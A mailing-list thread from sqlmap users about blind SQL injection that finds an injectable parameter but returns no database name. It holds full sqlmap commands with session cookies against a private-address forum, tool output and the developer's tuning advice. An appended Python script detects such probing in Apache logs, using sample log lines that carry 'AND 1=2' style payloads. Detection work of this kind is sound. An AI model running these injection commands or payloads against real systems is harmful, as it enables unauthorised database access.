Thread: [sqlmap-users] Blind injection possible - no output
From: Erik N. <da...@gm...> - 2009-09-08 12:48:12
sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=107765125.29.10.1252406202; __utmc=107765125; PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id --string="Secret Forum" --fingerprint

[14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[14:09:04] [INFO] testing for parenthesis on injectable parameter
[14:09:06] [INFO] the injectable parameter requires 0 parenthesis
[14:09:06] [INFO] testing MySQL
[14:09:07] [INFO] confirming MySQL
[14:09:08] [INFO] retrieved:
[14:09:10] [INFO] the back-end DBMS is MySQL
[14:09:10] [INFO] retrieved:
[14:11:28] [INFO] retrieved:
[14:11:32] [INFO] retrieved:
[14:11:35] [INFO] retrieved:
[14:11:41] [INFO] retrieved:
[14:11:46] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: active fingerprint: MySQL < 3.22.11
comment injection fingerprint: MySQL 5.0.75

[*] shutting down at: 14:12:50

sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=107765125.29.10.1252406202; __utmc=107765125; PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id --string="Secret Forum" --current-db

[14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[14:14:01] [INFO] testing for parenthesis on injectable parameter
[14:14:03] [INFO] the injectable parameter requires 0 parenthesis
[14:14:03] [INFO] testing MySQL
[14:14:04] [INFO] confirming MySQL
[14:14:05] [INFO] retrieved:
[14:14:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: MySQL < 5.0.0

[14:14:07] [INFO] fetching current database
[14:14:07] [INFO] retrieved:
current database: None

What to do?
From: Bernardo D. A. G. <ber...@gm...> - 2009-09-17 16:52:16
Hi Erik,

Try to force the back-end database software and version manually if you know it, e.g. --dbms "mysql 5" and double check that the provided string to match on is not present within any False response (eg. AND 1=2).

Cheers,
Bernardo

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Erik N. <da...@gm...> - 2009-09-17 17:34:39
Thank you for your answer, unfortunately it didn't help me. I tried to force the back-end dbms into a number of different variations. I also double checked that the string isn't present when using AND 1=2. Using --fingerprint gave me no output as well. This is what I got from that run:

[19:28:54] [WARNING] the testable parameter 'id' you provided is not into the Cookie
[19:28:54] [INFO] testing connection to the target url
[19:28:58] [INFO] testing if the provided string is within the target URL page content
[19:28:59] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[19:28:59] [INFO] testing unescaped numeric injection on GET parameter 'id'
[19:29:03] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[19:29:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[19:29:04] [INFO] testing for parenthesis on injectable parameter
[19:29:07] [INFO] the injectable parameter requires 0 parenthesis
[19:29:07] [INFO] the back-end DBMS is MySQL
[19:29:07] [INFO] testing MySQL
[19:29:13] [INFO] confirming MySQL
[19:29:17] [INFO] retrieved:
[19:29:25] [INFO] the back-end DBMS is MySQL
[19:29:25] [INFO] retrieved:
[19:29:34] [INFO] retrieved:
[19:29:43] [INFO] retrieved:
[19:29:49] [INFO] retrieved:
[19:29:59] [INFO] retrieved:
[19:30:06] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: active fingerprint: MySQL < 3.22.11
comment injection fingerprint: MySQL 5.0.75

[*] shutting down at: 19:32:09
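The true/false probing Bernardo describes (the AND 1=2 style predicates that sqlmap appends to the 'id' parameter) is visible from the other side as well: on the web server it leaves a run of requests from one client against one parameter, each carrying a different boolean condition, with the response size flipping between two values. The script below is an added example written for this thread; it is not code from the sqlmap project or from either poster. It assumes the default Apache "combined" log format, and the log lines embedded in it are constructed to resemble such a run against the forum URL from the thread; they are not real records. The user-agent "sqlmap/x.y" is a placeholder.

```python
"""Flag boolean-based blind SQL injection probing in Apache combined access logs."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A boolean predicate appended to a parameter value: "AND <term> <cmp> <term>",
# the shape of the AND 1=1 / AND 1=2 pair mentioned in the thread.
BOOL_RE = re.compile(r"\b(?:AND|OR)\b\s+\S+\s*(?:<>|!=|<=|>=|=|<|>)", re.IGNORECASE)

# Parameters the application expects to be plain integers (assumption about the
# forum application; adjust for the site being monitored).
NUMERIC_PARAMS = {"id"}

# Constructed sample log (not real records): one client probing 'id' four times,
# another client browsing normally.
SAMPLE_LOG = """\
10.0.0.7 - - [08/Sep/2009:14:08:59 +0200] "GET /forum/index/forum?id=8 HTTP/1.1" 200 5123 "-" "sqlmap/x.y"
10.0.0.7 - - [08/Sep/2009:14:09:00 +0200] "GET /forum/index/forum?id=8%20AND%201=1 HTTP/1.1" 200 5123 "-" "sqlmap/x.y"
10.0.0.7 - - [08/Sep/2009:14:09:01 +0200] "GET /forum/index/forum?id=8%20AND%201=2 HTTP/1.1" 200 4096 "-" "sqlmap/x.y"
10.0.0.7 - - [08/Sep/2009:14:09:02 +0200] "GET /forum/index/forum?id=8%20AND%207315=7315 HTTP/1.1" 200 5123 "-" "sqlmap/x.y"
10.0.0.7 - - [08/Sep/2009:14:09:03 +0200] "GET /forum/index/forum?id=8%20AND%207315=7316 HTTP/1.1" 200 4096 "-" "sqlmap/x.y"
192.168.1.50 - - [08/Sep/2009:14:09:05 +0200] "GET /forum/index/forum?id=9 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
192.168.1.50 - - [08/Sep/2009:14:09:06 +0200] "GET /forum/index/forum?id=9&page=2 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    # parse_qsl percent-decodes and splits each pair only at its first '=',
    # so "id=8%20AND%201=1" becomes ("id", "8 AND 1=1").
    entry["params"] = parse_qsl(urlsplit(entry["target"]).query, keep_blank_values=True)
    return entry


def suspicious_params(entry):
    """Return (name, value, reason) for each parameter whose value looks like a probe."""
    hits = []
    for name, value in entry["params"]:
        if BOOL_RE.search(value):
            hits.append((name, value, "boolean predicate appended to value"))
        elif name in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", value):
            hits.append((name, value, "non-integer value in integer parameter"))
    return hits


def analyze(log_text, min_probes=3):
    """Group probes by (client ip, parameter); keep groups that reach the threshold.

    One odd request is noise. Several different predicates against the same
    parameter from one client, with the response size alternating between two
    values, is the signature of boolean-based blind inference.
    """
    groups = defaultdict(lambda: {"probes": 0, "payloads": set(), "sizes": set(), "uas": set()})
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for name, value, _reason in suspicious_params(entry):
            g = groups[(entry["ip"], name)]
            g["probes"] += 1
            g["payloads"].add(value)
            g["sizes"].add(entry["size"])
            g["uas"].add(entry["ua"])
    findings = {}
    for key, g in groups.items():
        if g["probes"] >= min_probes:
            g["size_flips"] = len(g["sizes"]) == 2  # true and false responses differ in length
            g["tool_ua"] = any("sqlmap" in ua.lower() for ua in g["uas"])  # weak: UA is spoofable
            findings[key] = g
    return findings


if __name__ == "__main__":
    for (ip, param), g in analyze(SAMPLE_LOG).items():
        print(f"{ip} probed parameter '{param}' {g['probes']} times; "
              f"response size flips: {g['size_flips']}; scanner user-agent: {g['tool_ua']}")
```

The size-flip check is the part worth keeping even when the predicate regex is evaded: a client whose responses for one URL alternate between exactly two lengths over many requests is running an inference loop, whatever the payload encoding. Run it over a real access log with `analyze(open(path).read())` and tune `min_probes` to the site's traffic.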